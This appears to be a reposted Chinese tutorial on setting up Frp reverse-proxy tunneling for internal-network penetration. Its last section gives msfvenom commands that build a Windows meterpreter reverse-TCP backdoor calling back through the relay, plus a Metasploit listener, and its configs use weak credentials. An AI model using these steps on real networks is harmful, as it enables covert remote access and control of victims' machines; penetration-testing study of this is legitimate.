目錄

Frp（簡易上線）

1、簡述：

2、工具：

3、使用：

1、準備：

2、服務端（公網）：

2、客戶端（內網）：

3、測試方法：

4、生成后門木馬監聽：

---

Frp（簡易上線）

1、簡述：

1）Frp (Fast Reverse Proxy) 是一個免費開源的用于內網穿透的反向代理應用，它支持 TCP、UDP 協議， 也為 HTTP、HTTPS 協議提供了額外的支持。

---

2）frp：服務端（裝在公網ip的服務器上）+客戶端（裝在內網主機上）

---

3）中轉站功能：實現公網 ←→ FRP(服務器) ←→ 內網 的連接（可以將內網服務以安全、便捷的方式通過具有公網IP節點的中轉暴露到公網。）

---

4）原理：

第一步：服務端：運行，并監聽端口，等待客戶端連接

第二步：客戶端：連接服務端的端口，告訴服務端要監聽的端口和轉發類型

第三步：服務端：創建新的進程，監聽客戶端指定的端口

第四步：外網用戶：連接到客戶端指定的端口，服務端通過和客戶端的連接將數據轉發到客戶端

第五步：客戶端：進程將數據轉發到本地服務

2、工具：

URL：https://github.com/fatedier/frp

選擇合適的版本

Releases · fatedier/frp (github.com)https://github.com/fatedier/frp/releases

3、使用：

1、準備：

1）準備一個域名（注冊一個，直接使用ip也可）

2）準備一個服務器（阿里云、騰訊云等都可以免費領一個月）

3）VM中搭建一個虛擬機（內網環境）

4）測試連通性，使用Xshell，或者準備一臺非同一局域網下主機并使用ssh命令

5）下載frp工具

命令行輸入： wget https://github.com/fatedier/frp/releases/download/v0.46.1/frp_0.46.1_linux_arm64.tar.gz

（下載太慢了，我直接下載到電腦上，然后使用xshell配套的xftp傳上去）

先解壓后再上傳的話

1：上傳到客戶端上面的（即內網主機）

2：上傳到服務端上面的（即公網服務器）

?

s結尾代表server（服務端）

c結尾代表client（客戶端）

——————

4）文件解壓?

如果直接使用的命令下載的，就需要解壓

tar -zxvf frp_0.46.1_linux_amd64.tar.gz

方法一：然后把服務端的文件cp出來（或刪掉客戶端文件）

sudo mkdir 創建文件夾 sudo cp 原文件的位置 將要復制到的位置

方法二：直接刪除客戶端文件

rm frpc rm frpc.ini rm frpc_full.ini

解壓之后文件夾改個名，方便操作

——————

5）文件添加權限（客戶端、服務端）

cd /usr/local/frp sudo chmod 777 frpc （777為所有權限，也可以換為+x可執行權限，熟悉Linux的就不用多說了）

---

2、服務端（公網）：

1）修改配置文件（frps.ini）

編輯文件內容 vim ./frps.ini 配置文件內容 [common] bind_port = 7000 # 服務端與客戶端通信端口 dashboard_port = 7500 # 后臺管理端口 dashboard_user = admin # 后臺登錄用戶名 dashboard_pwd = adminvhost_http_port = 7002 # http穿透端口 vhost_https_port = 7003 # https穿透端口 max_pool_count = 50token = 123456 # 身份驗證令牌，frpc要與frps一致 tcp_mux = truelog_file = /usr/local/frp/frps.log # 日志相關配置 log_level = info log_max_days = 3authentication_timeout = 0 # 服務器與客戶端時間相差15min會連接失敗，0表示不驗證 subdomain_host = …… # 填寫自己注冊的域名 privilege_mode = true

——————

2）訪問的端口開發

（以騰訊云為例）

方法一：

直接在服務器控制臺上添加規則

方法二：

Linux使用命令行添加

# 添加監聽端口 sudo firewall-cmd --permanent --add-port=7000/tcp # 添加管理后臺端口 sudo firewall-cmd --permanent --add-port=7500/tcp sudo firewall-cmd --reload

方法三：

使用ufw、iptables工具

方法四：

直接關閉防火墻

——————

3）啟動服務端：

./frps -c ./frps.ini

啟動成功

——————

4）訪問后臺管理界面

服務器ip（或者域名）:port（7500）

并使用自己設置的用戶名，密碼登陸

————

擴展：

關閉窗口會停止

所以，需要后臺運行

nohup ./frps -c frps.ini &

---

2、客戶端（內網）：

1）解壓、保留客戶端配置文件

——————

2）修改配置文件

編輯配置文件 vim ./frpc.ini # 客戶端配置 [common] server_addr = …… # 公網服務器ip server_port = 7000 # 公網服務端通信端口，與frps.ini的bind_port一致token = 123456 # 身份驗證令牌，與服務端的frps.ini中token一致） tcp_mux = truelog_file = /usr/local/frp/frpc.log # 日志相關 log_level = info log_max_days = 3 authentication_timeout = 0 # 服務器與客戶端時間相差15min會連接失敗，0表示不驗證# 配置ssh服務 [ssh] # 添加ssh節點 type = tcp local_ip = 192.168.xxx.xxx # 或者127.0.0.1 local_port = 22 remote_port = 7001 # 指明由公網服務器的7001端口代理（ssh連接端口，遠程服務端口）# 配置http服務，可用于其他開發 [web01] # 添加web節點 type = http local_ip = 192.168.xxx.xxx # 或者127.0.0.1 local_port = 8080 # 本地8080端口（自定義的tomcat服務）可以通公網服務器7002端口訪問 subdomain = web01 # 自定義子域名

——————

3）防火墻端口開放

開放方法和服務端類似

——————

4）客戶端啟動

./frpc -c frpc.ini

---

3、測試方法：

方法一：

直接使用Xshell工具，對公網服務器進行連接（公網服務器ip）

端口設置為客戶端指定的服務器代理端口（remote_port = 7001）

————

方法二：

使用不在同一局域網下的電腦

ssh admin@***.*.*.* -p 端口# -p 指定服務器端口號，不指定端口則默認22，但此處修改為我們設置的ssh服務端口7001 # admin 為登錄的用戶名 # ***.*.*.* 為公網服務器ip/域名

————

注：

如果報錯Connection closed by……

1、授予ssh權限

2、開啟ssh服務

---

4、生成后門木馬監聽：

msfvenom -p windows/meterpreter/reverse_tcp lhost=公網服務器ip lport=服務端代理客戶端的端口（即remote_port ） -f exe -o frp.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555

（注：這個監聽端口lport，與本地轉發端口一致）
exploit

總結

以上是生活随笔為你收集整理的【内网安全-隧道搭建】内网穿透_Frp上线、测试的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。